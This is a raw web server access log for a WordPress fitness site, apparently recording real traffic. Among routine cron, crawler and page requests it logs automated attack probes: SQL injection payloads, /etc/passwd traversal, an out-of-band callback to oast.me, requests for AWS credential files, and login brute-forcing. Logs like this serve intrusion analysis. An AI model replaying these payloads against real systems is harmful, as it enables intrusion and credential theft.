184.94.212.206 - - [27/Apr/2026:23:52:23 +0000] "POST /wp-cron.php?doing_wp_cron=1777333943.6003808975219726562500 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [27/Apr/2026:23:52:21 +0000] "GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
184.94.212.206 - - [27/Apr/2026:23:54:29 +0000] "POST /wp-cron.php?doing_wp_cron=1777334069.4747550487518310546875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
137.74.133.23 - - [27/Apr/2026:23:54:28 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36"
137.74.133.23 - - [27/Apr/2026:23:54:29 +0000] "POST /wp-login.php HTTP/1.1" 200 2018 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36"
45.129.231.10 - - [27/Apr/2026:23:56:32 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 11897 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:109.0) Gecko/20100101 Firefox/115.0"
184.94.212.206 - - [27/Apr/2026:23:58:03 +0000] "POST /wp-cron.php?doing_wp_cron=1777334283.1849429607391357421875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
57.141.18.120 - - [27/Apr/2026:23:58:01 +0000] "GET /2020/04/08/tips-for-fitness-based-nutrition/ HTTP/1.1" 200 66264 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
114.119.148.14 - - [27/Apr/2026:23:58:09 +0000] "GET /product-category/services/ HTTP/1.1" 200 12878 "https://the-muscle-building.info/product/fitness-trainer-product-1/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
188.40.30.21 - - [27/Apr/2026:23:58:39 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.55"
184.94.212.206 - - [27/Apr/2026:23:58:41 +0000] "POST /wp-cron.php?doing_wp_cron=1777334321.2376670837402343750000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
188.40.30.21 - - [27/Apr/2026:23:58:40 +0000] "POST /wp-login.php HTTP/1.1" 200 2018 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.55"
184.94.212.206 - - [27/Apr/2026:23:59:44 +0000] "POST /wp-cron.php?doing_wp_cron=1777334384.9408359527587890625000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
114.119.148.14 - - [27/Apr/2026:23:59:43 +0000] "GET /9cafb-fitness-trainer-my-account HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.148.14 - - [27/Apr/2026:23:59:45 +0000] "GET /9cafb-fitness-trainer-my-account/ HTTP/1.1" 200 12799 "https://the-muscle-building.info/9cafb-fitness-trainer-my-account" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
184.94.212.206 - - [28/Apr/2026:00:04:25 +0000] "POST /wp-cron.php?doing_wp_cron=1777334665.6967110633850097656250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:04:24 +0000] "GET /wp1/home-18/?qtproxycall=https://oast.me HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1"
184.94.212.206 - - [28/Apr/2026:00:05:07 +0000] "POST /wp-cron.php?doing_wp_cron=1777334707.5378320217132568359375 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:05:06 +0000] "GET /wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0"
45.129.231.10 - - [28/Apr/2026:00:05:06 +0000] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Mobile/15E148 Safari/604.1"
184.94.212.206 - - [28/Apr/2026:00:08:10 +0000] "POST /wp-cron.php?doing_wp_cron=1777334890.6699340343475341796875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
85.131.213.133 - - [28/Apr/2026:00:08:09 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
85.131.213.133 - - [28/Apr/2026:00:08:11 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
113.160.132.26 - - [28/Apr/2026:00:13:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
113.160.132.26 - - [28/Apr/2026:00:13:08 +0000] "POST /wp-comments-post.php HTTP/1.1" 429 1107 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
113.160.132.26 - - [28/Apr/2026:00:13:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 429 1107 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.208.218.164 - - [28/Apr/2026:00:13:17 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; FunWebProducts; rv:11.0) like Gecko"
103.208.218.164 - - [28/Apr/2026:00:13:19 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; FunWebProducts; rv:11.0) like Gecko"
45.79.147.155 - - [28/Apr/2026:00:13:34 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
45.79.147.155 - - [28/Apr/2026:00:13:35 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:00:14:03 +0000] "POST /wp-cron.php?doing_wp_cron=1777335243.6794869899749755859375 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
190.107.177.233 - - [28/Apr/2026:00:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
190.107.177.233 - - [28/Apr/2026:00:14:04 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:00:18:17 +0000] "POST /wp-cron.php?doing_wp_cron=1777335497.0448770523071289062500 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
40.160.252.123 - - [28/Apr/2026:00:18:15 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:00:18:54 +0000] "POST /wp-cron.php?doing_wp_cron=1777335534.4623029232025146484375 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:18:53 +0000] "GET /wp-json/h5vp/v1/video/0?id='+union+all+select+concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5(999999999)),2,3,4,5,6,7,8--+- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Mobile/15E148 Safari/604.1"
184.94.212.206 - - [28/Apr/2026:00:23:05 +0000] "POST /wp-cron.php?doing_wp_cron=1777335785.4667229652404785156250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:23:03 +0000] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
172.71.130.149 - - [28/Apr/2026:00:26:07 +0000] "GET /wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=10.5.0 HTTP/1.1" 200 11124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:00:27:23 +0000] "POST /wp-cron.php?doing_wp_cron=1777336043.6270549297332763671875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
128.241.254.194 - - [28/Apr/2026:00:27:22 +0000] "GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
128.241.254.194 - - [28/Apr/2026:00:27:22 +0000] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
128.241.254.194 - - [28/Apr/2026:00:27:22 +0000] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:22 +0000] "POST / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (X11; Linux i686; en-US) Gecko/20010604 Firefox/109.0"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.5 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "GET /wp-admin/admin-ajax.php?action=awpcp-get-regions-options&context=search&parent_type=country&parent=test&type=id`+FROM+wp_users+WHERE+1=0+UNION+SELECT+VERSION();--+- HTTP/1.1" 400 21 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "POST /wp-json/textmagic/v1/smsreceived HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1" 404 117 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:27 +0000] "POST /wp-json/lp/v1/courses/archive-course HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "GET /wp-json/wp/v2/gamipress-logs?trigger_type[]=test')%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))x)%20AND%20('a'='a HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "POST / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
128.241.254.194 - - [28/Apr/2026:00:27:28 +0000] "POST / HTTP/1.1" 401 113 "-" "Mozilla/5.0 (Windows NT 6.2; rv:140.) Gecko/20100101 Firefox/140."
128.241.254.194 - - [28/Apr/2026:00:27:29 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0"
209.42.18.204 - - [28/Apr/2026:00:27:33 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENUSMSE; rv:11.0) like Gecko"
209.42.18.204 - - [28/Apr/2026:00:27:35 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENUSMSE; rv:11.0) like Gecko"
212.47.78.127 - - [28/Apr/2026:00:27:38 +0000] "GET / HTTP/1.1" 200 14620 "http://the-muscle-building.info/" "Go-http-client/1.1"
184.94.212.206 - - [28/Apr/2026:00:27:43 +0000] "POST /wp-cron.php?doing_wp_cron=1777336063.0612781047821044921875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
128.241.254.194 - - [28/Apr/2026:00:27:41 +0000] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12"
128.241.254.194 - - [28/Apr/2026:00:27:42 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
184.94.212.206 - - [28/Apr/2026:00:27:44 +0000] "POST /wp-cron.php?doing_wp_cron=1777336064.5461339950561523437500 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
128.241.254.194 - - [28/Apr/2026:00:27:42 +0000] "GET /index.php/user/ HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15"
128.241.254.194 - - [28/Apr/2026:00:27:42 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36 Browser"
128.241.254.194 - - [28/Apr/2026:00:27:42 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
103.28.36.220 - - [28/Apr/2026:00:28:06 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
103.28.36.220 - - [28/Apr/2026:00:28:08 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
184.94.212.206 - - [28/Apr/2026:00:30:49 +0000] "POST /wp-cron.php?doing_wp_cron=1777336249.4193530082702636718750 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:30:48 +0000] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
184.94.212.206 - - [28/Apr/2026:00:30:50 +0000] "POST /wp-cron.php?doing_wp_cron=1777336250.0189769268035888671875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:30:48 +0000] "GET /wp1/home-18/?qtproxycall=https://oast.me HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:139.0) Gecko/20100101 Firefox/139.0"
184.94.212.206 - - [28/Apr/2026:00:30:50 +0000] "POST /wp-cron.php?doing_wp_cron=1777336250.0700290203094482421875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:30:48 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:00:33:28 +0000] "POST /wp-cron.php?doing_wp_cron=1777336408.3763039112091064453125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
65.2.7.160 - - [28/Apr/2026:00:33:26 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
65.2.7.160 - - [28/Apr/2026:00:33:28 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.primemusicproductions.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
184.94.212.206 - - [28/Apr/2026:00:35:30 +0000] "POST /wp-cron.php?doing_wp_cron=1777336530.9342501163482666015625 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
216.73.216.119 - - [28/Apr/2026:00:35:29 +0000] "GET /robots.txt HTTP/1.1" 200 179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.119 - - [28/Apr/2026:00:35:31 +0000] "GET /wp-sitemap.xml HTTP/1.1" 200 246 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
184.94.212.206 - - [28/Apr/2026:00:36:21 +0000] "POST /wp-cron.php?doing_wp_cron=1777336581.3932900428771972656250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
107.155.97.54 - - [28/Apr/2026:00:36:19 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
184.94.212.206 - - [28/Apr/2026:00:37:31 +0000] "POST /wp-cron.php?doing_wp_cron=1777336651.6050620079040527343750 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
162.241.244.10 - - [28/Apr/2026:00:37:30 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
162.241.244.10 - - [28/Apr/2026:00:37:31 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko"
184.94.212.206 - - [28/Apr/2026:00:37:57 +0000] "POST /wp-cron.php?doing_wp_cron=1777336677.7964088916778564453125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
178.156.229.216 - - [28/Apr/2026:00:37:56 +0000] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
178.156.229.216 - - [28/Apr/2026:00:38:02 +0000] "GET / HTTP/1.1" 206 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
184.94.212.206 - - [28/Apr/2026:00:46:36 +0000] "POST /wp-cron.php?doing_wp_cron=1777337196.4439220428466796875000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
160.250.130.228 - - [28/Apr/2026:00:46:35 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; TAJB; rv:11.0) like Gecko"
184.94.212.206 - - [28/Apr/2026:00:55:59 +0000] "POST /wp-cron.php?doing_wp_cron=1777337759.8127460479736328125000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
141.98.11.117 - - [28/Apr/2026:00:55:58 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASPJS; rv:11.0) like Gecko"
141.98.11.117 - - [28/Apr/2026:00:56:00 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASPJS; rv:11.0) like Gecko"
184.94.212.206 - - [28/Apr/2026:00:57:44 +0000] "POST /wp-cron.php?doing_wp_cron=1777337864.1398429870605468750000 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.129.231.10 - - [28/Apr/2026:00:57:42 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/10.0"
45.129.231.10 - - [28/Apr/2026:00:57:42 +0000] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
45.129.231.10 - - [28/Apr/2026:00:57:50 +0000] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:00:38 +0000] "POST /wp-cron.php?doing_wp_cron=1777338038.7409389019012451171875 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
45.145.129.91 - - [28/Apr/2026:01:00:36 +0000] "GET / HTTP/1.1" 200 14620 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:00:49 +0000] "POST /wp-cron.php?doing_wp_cron=1777338049.6328270435333251953125 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
3.123.87.197 - - [28/Apr/2026:01:00:48 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36"
3.123.87.197 - - [28/Apr/2026:01:00:49 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.primemusicproductions.com/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36"
170.168.240.172 - - [28/Apr/2026:01:01:05 +0000] "GET /s3cmd.ini HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5  (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1"
152.53.111.131 - - [28/Apr/2026:01:01:14 +0000] "GET /wp-login.php HTTP/1.1" 200 1918 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
152.53.111.131 - - [28/Apr/2026:01:01:15 +0000] "POST /wp-login.php HTTP/1.1" 200 2017 "https://the-muscle-building.info/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
185.88.100.179 - - [28/Apr/2026:01:01:19 +0000] "GET /.aws/credentials HTTP/1.1" 404 11896 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063"
77.81.65.203 - - [28/Apr/2026:01:01:35 +0000] "GET //the-muscle-building.info/wp-includes/js/wp-emoji-release.min.js HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
184.94.212.206 - - [28/Apr/2026:01:01:43 +0000] "POST /wp-cron.php?doing_wp_cron=1777338103.0005459785461425781250 HTTP/1.1" 200 - "-" "WordPress/6.9.4; https://the-muscle-building.info"
